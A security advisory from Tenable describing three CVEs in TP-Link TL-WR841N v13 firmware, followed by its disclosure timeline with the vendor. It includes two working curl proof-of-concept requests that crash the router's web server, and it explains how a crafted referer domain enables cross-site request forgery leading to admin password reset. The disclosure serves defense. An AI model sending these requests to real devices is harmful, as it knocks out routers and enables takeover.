Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R1] TP-Link TL-WRN841N Multiple Vulnerabilities

Critical

Synopsis

Tenable was recently investigating TP-Link's TL-WR841N v13 using firmware 0.9.1 4.16 v0348.0 (listed as TL-WR841N(US)_V13_180119 on the download page). As a result, Tenable found multiple vulnerabilities.

CVE-2018-15700: httpd Denial of Service via Referer Header

A locally connected user sending an HTTP request with a missing protocol string in the "Referer" field will result in the httpd service terminating. We believe this is a NULL pointer dereference error in the http_parser_main function. The problem starts with a memcmp looking for "http://" in the first seven bytes of the "Referer" field. Only if this succeeds will a "Referer" string variable be initialized. When the memcmp fails the program flow still continues and attempts string operations on the uninitialized NULL string. The resulting crash requires a router reboot to revive httpd web interface.

curl 'http://tplinkwifi.net/' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: DOS' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' --compressed

CVE-2018-15701: httpd Denial of Service via Cookie Header

Crafting an HTTP request with an HTTP "Cookie" field of "Authorization;" will result in the httpd service terminating. Again, a router reboot is required to revive the web interface. We believe this is another parsing error in "http_parser_main".

curl 'http://tplinkwifi.net/' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: http://tplinkwifi.net/' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' -H 'Cookie: Authorization;' --compressed

CVE-2018-15702: XSRF due to Incomplete Referer Check

In the http_parser_main function, referer whitelisting is accomplished using strncmp with a length field derived from "tplinklogin.net", "tplinkwifi.net", or router IP strings. Since strncmp is only comparing the first few characters of the referer domain string, an attacker can pass this check by crafting a domain or subdomain of "tplinklogin.net**", "tplinkwifi.net*", or "<router's IP>*".

This issue is magnified in severity due to a previously disclosed but unpatched authentication bypass vulnerability (CVE-2018-11714). This allows a remote attacker to perform XSRF to various sensitive cgi scripts. A remote attacker is able enable remote management and reset the router admin password.

Solution

Currently no solution exists. At time of publication, the most recent firmware version on TP-Link's website is listed as TL-WR841N(US)_V13_180119 which is the vulnerable firmware version (0.9.1 4.16 v0348.0).

Disclosure Timeline

07-02-2018 - Tenable sends vulnerability write up and proof of concepts to TP-Link.
07-18-2018 - Tenable asks TP-Link for acknowledgement.
07-18-2018 - TP-Link says all the bugs already fixed. Suggests Tenable verifies using the latest firmware.
07-27-2018 - Tenable confirms the vulnerabilities still exist in the latest build (0.9.1 4.16 v0348.0 Build 180119 Rel 66498n). Tenable asks if there is a more recent unpublished build.
07-27-2018 - TP-Link says they will check the firmware and let Tenable know.
08-27-2018 - Tenable asks for an update.
08-27-2018 - TP-Link asks for hardware version and firmware version.
08-27-2018 - Tenable responds TL-WR841N V13 0.9.1 4.16 v0348.0 Build 180119 Rel 66498n
08-27-2018 - TP-Link sends a beta firmware for Tenable to test.
08-27-2018 - TP-Link follows up that they hope for feedback ASAP.
08-27-2018 - Tenable can't download the rar attachment via email.
08-27-2018 - TP-Link suggests using we-transfer.
08-27-2018 - Tenable agrees.
08-30-2018 - Tenable asks TP-Link for an update.
08-30-2018 - TP-Link says they sent a we-transfer. They'll try again.
08-30-2018 - Tenable receive receipt of the firmware (0.9.1 4.16 v0348.0 Build 180821 Rel.42708n(Beta)) and confirms that two vulnerabilities still exist.
08-30-2018 - TP-Link notifies Tenable of another we-transfer.
08-30-2018 - Tenable informs TP-Link that they sent the exact same firmware as before.
09-20-2018 - Tenable asks TP-Link for an update.
09-20-2018 - TP-Link says they already sent the beta version.
09-20-2018 - Tenable says they haven't received anything new.
09-20-2018 - TP-Link says we-transfer informed them that Tenable downloaded the firmware. Asks Tenable for an email address that doesn't block rar files.
09-20-2018 - Tenable reiterates that the last downloaded version was vulnerable. Tenable asks for a new version via we-transfer.
10-01-2018 - Tenable reminds TP-Link that today is the 90 day disclosure day.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2018-27
Credit:
David Wells
CVSSv2 Base / Temporal Score:
9.3/7.5
CVSSv2 Vector:
AV:N/AC:M/Au:N/C:C/I:C/A:C
Nessus Plugin ID: 117861
Affected Products:
TL-WR841N v13 0.9.1 4.16 v0348.0
Risk Factor:
Critical

Advisory Timeline

10-01-2018 - [R1] Initial Release